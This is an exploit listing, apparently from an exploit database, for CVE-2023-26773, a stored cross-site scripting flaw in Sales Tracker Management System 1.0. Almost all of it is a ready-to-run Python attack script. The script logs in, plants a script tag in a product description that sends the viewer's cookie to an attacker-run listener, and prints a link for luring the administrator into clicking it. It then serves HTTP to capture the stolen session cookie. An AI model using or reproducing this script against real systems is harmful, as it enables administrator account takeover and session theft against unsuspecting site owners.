Exploit for Sales Tracker Management System 1.0 Cross Site Scripting CVE-2023-26773

Name: Exploit for Sales Tracker Management System 1.0 Cross Site Scripting CVE-2023-26773
Rating: 5 (159 reviews)
2023-04-05 | CVSS 6.5
## https://sploitus.com/exploit?id=PACKETSTORM:171686
# Exploit Title: Sales Tracker Management System v1.0 - One click account takeover XSS  
# Exploit Author: Achuth V P (retrymp3)  
# Date: February 08, 2023  
# CVE: CVE-2023-26773  
# Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code  
# Tested on: Ubuntu, Apache, Mysql  
# Vendor: oretnom23  
# Version: v1.0  
# Exploit Description: Sales Tracker Management System v1.0 suffers from XSS which results in one click account take over by stealing cookies.  
  
import requests  
from requests.auth import HTTPBasicAuth  
import http.server  
import socketserver  
import argparse  
from colorama import (Fore as F, Back as B, Style as S)  
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT  
  
  
def expServer():  
Handler = http.server.SimpleHTTPRequestHandler  
PORT = 8000 #You can change.  
with socketserver.TCPServer(("", PORT), Handler) as httpd:  
print("serving at port", PORT)  
httpd.serve_forever()  
  
def auth():  
print("Enter the username and password for a normal user")  
user=input("Username: ")  
passwd=input("Password: ")  
auth = HTTPBasicAuth(user, passwd)  
params = {'username': user, 'password': passwd}  
#proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}  
#proxies=proxies give it as an argument to requests.get() to proxy it through burp.  
req=requests.post(url+'classes/Login.php?f=login',data=params)  
  
def payL():  
tf=requests.post(url+'/classes/Master.php?f=save_product',  
files=(  
('id', (None, '1')),  
('code', (None, '123456')),  
('name', (None, 'xssssssREssss')),  
('description', (None, '<script>document.location="http://0.0.0.0:8000/?cookie="+document.cookie</script>')),  
('price', (None, '355.19')),  
('status', (None, '1'))  
)  
)  
if (tf):  
print("Send this to admin: "+FR+url+"admin/products/view_product.php?id=1"+FR+"\n")  
print(FC+"When admin clicks on the link you can see admin's cookie in the request log of the python server"+FY+"\n")  
else:  
print("Bad request. Check the url")  
  
def bullet(char,color):  
C=FB if color == 'B' else FR if color == 'R' else FG  
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '  
  
  
def sig():  
SIG = SB+FY+" "+FR+".-----..___.._____. "+FY+"\n"  
SIG += FY+" | .. >||__-__-_| \n"  
SIG += FY+" "+FR+"| |.' ,||_______ "+FY+"\n"  
SIG += FY+" | _ < ||__-__-_|"+FR+"* * *"+FY+" \n"  
SIG += FY+" | |\ \ ||__-__-_\n"  
SIG += FY+" "+FR+"|___ \_ \||_______| "+FY+"\n"  
SIG += FY+"\n"+" _____"+FR+"github.com/retrymp3"+FY+"_____\n"+ST  
return SIG  
  
def argsetup():  
about = SB+FT+'Admin account takeover - Sales Tracking Manager v1.0\n'+ST  
return about  
  
  
if __name__ == "__main__":  
header = SB+FT+"\n"+' '+FR+'retrymp3\n'+ST  
print(header)  
print(sig())  
print(argsetup())  
url=input("Enter the base url: ")  
auth()  
payL()  
expServer()